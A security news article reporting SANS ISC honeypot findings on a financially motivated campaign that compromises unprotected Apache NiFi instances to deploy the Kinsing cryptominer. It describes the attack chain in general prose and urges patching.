Discoveries by the SANS Internet Storm Center (ISC) shed light on an ongoing campaign orchestrated by a financially motivated threat actor. This cyber criminal is actively scouring the internet, seeking out vulnerable Apache NiFi instances to install a cryptocurrency miner surreptitiously.
Through this malicious activity, the attacker not only mines digital currencies but also gains the ability to move laterally within the compromised systems. The ISC observed a significant surge in HTTP requests for “/nifi” on May 19, 2023, providing crucial insights into this emerging threat landscape.
Pervasive Persistence
Dr. Johannes Ullrich, the dean of research for SANS Technology Institute, explains the attacker’s techniques for achieving persistence within compromised systems. Through the implementation of timed processors or entries to cron, the attacker ensures that their foothold remains intact. Crucially, the attack script employed by the threat actor is not stored on the system; rather, it resides solely in the system’s memory. This approach allows the attacker to evade detection and maintain their malicious presence.
The Honeypot Revelation
A honeypot setup enabled the ISC to gain valuable intelligence on the initial stages of the attack. The threat actor employs a weaponized payload that deploys a shell script capable of executing various actions. This includes the removal of the “/var/log/syslog” file, the disabling of the firewall, and the termination of competing crypto-mining tools. Once these preparatory actions are completed, the attacker proceeds to download and launch the Kinsing malware from a remote server. This multi-faceted approach highlights the threat actor’s dedication to maximizing their reach and potential impact.
Leveraging Publicly Disclosed Vulnerabilities
Of particular concern is the historical reliance of the Kinsing malware on publicly disclosed vulnerabilities found within accessible web applications. Trend Micro previously detailed an identical attack chain in September 2022, whereby the attacker exploited outdated Oracle WebLogic Server flaws (CVE-2020-14882 and CVE-2020-14883) to distribute the cryptocurrency mining malware. This highlights the importance of promptly patching and updating software to mitigate the risk of falling victim to such attacks.
Conclusion
The emergence of a financially motivated threat actor targeting unprotected Apache NiFi instances unveils a concerning trend within the cybersecurity landscape. The threat actor’s deployment of cryptocurrency mining tools, combined with lateral movement capabilities, underscores the urgency for organizations to secure their systems and stay vigilant against evolving threats.
By promptly applying security patches and maintaining an up-to-date infrastructure, organizations can fortify their defenses against the likes of Kinsing and similar threats.